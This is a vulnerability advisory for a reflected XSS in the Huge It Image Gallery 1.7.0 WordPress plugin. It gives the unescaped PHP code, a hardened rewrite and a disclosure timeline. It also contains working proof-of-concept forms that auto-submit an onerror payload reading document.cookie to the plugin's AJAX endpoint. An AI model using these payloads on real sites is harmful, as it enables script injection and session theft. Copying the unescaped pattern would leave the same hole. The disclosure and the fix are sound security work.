08-02-2016 / Vulnerabilities

Huge It Image Gallery 1.7.0 Reflected XSS

$_POST['thumbtext'] and $_POST['linkbutton'] are not escaped inside huge_it_video_gallery_ajax().

Also, the AJAX response does not set a JSON content type, so the reflected input is rendered by the browser as HTML.

File: gallery-images\gallery-images.php

$output .='
    <li class="huge_it_big_li">
         '.$likeCont.'<input type="hidden" class="pagenum" value="'.$page.'" />
            '.$video.'
        <div class="overLayer"></div>
        <div class="infoLayer">
            <ul>
                <li>
                    <h2>
                        '.$video_name.'
                    </h2>
                </li>
                <li>
                    <p>
                        '.$_POST['thumbtext'].'
                    </p>
                </li>
            </ul>
        </div>
    </li>
';
$button='<div class="button-block"><a href="'.$row->sl_url.'" '.$target.' >'.$_POST['linkbutton'].'</a></div>';
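A hardened version of the two fragments above, added here as an illustration (not the plugin's own code and not the vendor's 1.7.1 patch): the request fields are escaped for their output context and the response is declared as JSON. It assumes the surrounding variables ($output, $likeCont, $page, $video, $video_name, $row, $target) are set by the handler exactly as on the page.

```php
<?php
// Added illustration, not the plugin's own code. $output, $likeCont, $page,
// $video, $video_name, $row and $target are assumed to be set by the
// surrounding huge_it_video_gallery_ajax() handler as shown on the page.

// Untrusted request fields: unslash, reduce to plain text, never trust as HTML.
$thumbtext  = isset( $_POST['thumbtext'] )  ? sanitize_text_field( wp_unslash( $_POST['thumbtext'] ) )  : '';
$linkbutton = isset( $_POST['linkbutton'] ) ? sanitize_text_field( wp_unslash( $_POST['linkbutton'] ) ) : '';

$output .= '
    <li class="huge_it_big_li">
        ' . $likeCont . '<input type="hidden" class="pagenum" value="' . esc_attr( $page ) . '" />
        ' . $video . '
        <div class="overLayer"></div>
        <div class="infoLayer">
            <ul>
                <li><h2>' . esc_html( $video_name ) . '</h2></li>
                <li><p>' . esc_html( $thumbtext ) . '</p></li>
            </ul>
        </div>
    </li>
';

// esc_url() for the href attribute, esc_html() for the link text: each escape
// matches the context the value is written into.
$button = '<div class="button-block"><a href="' . esc_url( $row->sl_url ) . '" ' . $target . '>'
        . esc_html( $linkbutton ) . '</a></div>';

// wp_send_json() sets "Content-Type: application/json" and terminates the request,
// so a reflected fragment is no longer served as an HTML document even if an
// escape is missed elsewhere.
wp_send_json( array( 'output' => $output, 'button' => $button ) );
```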

Proof of Concept

Create a page containing the payload.

After the user opens the URL, the payload is sent to the browser.

<form name="xss" action="http://wp/wp-admin/admin-ajax.php?action=huge_it_video_gallery_ajax" method="post">
	<input type="hidden" name="task" value="load_image_thumbnail">
	<input type="hidden" name="page" value="1">
	<input type="hidden" name="perpage" value="1">
	<input type="hidden" name="galleryid" value="1">
	<input type="hidden" name="thumbtext" value='<img src=x onerror=alert(document.cookie)>'>
	<input type="submit" value="Send">
</form>
<script>document.xss.submit();</script>
<form name="xss" action="http://wp/wp-admin/admin-ajax.php?action=huge_it_video_gallery_ajax" method="post">
	<input type="hidden" name="task" value="load_images_content">
	<input type="hidden" name="page" value="1">
	<input type="hidden" name="perpage" value="1">
	<input type="hidden" name="galleryid" value="1">
	<input type="hidden" name="linkbutton" value='<img src=x onerror=alert(document.cookie)>'>
	<input type="submit" value="Send">
</form>
<script>document.xss.submit();</script>

Timeline

  • 02-12-2015: Discovered
  • 02-12-2015: Vendor notified
  • 03-12-2015: Version 1.7.1 released, issue resolved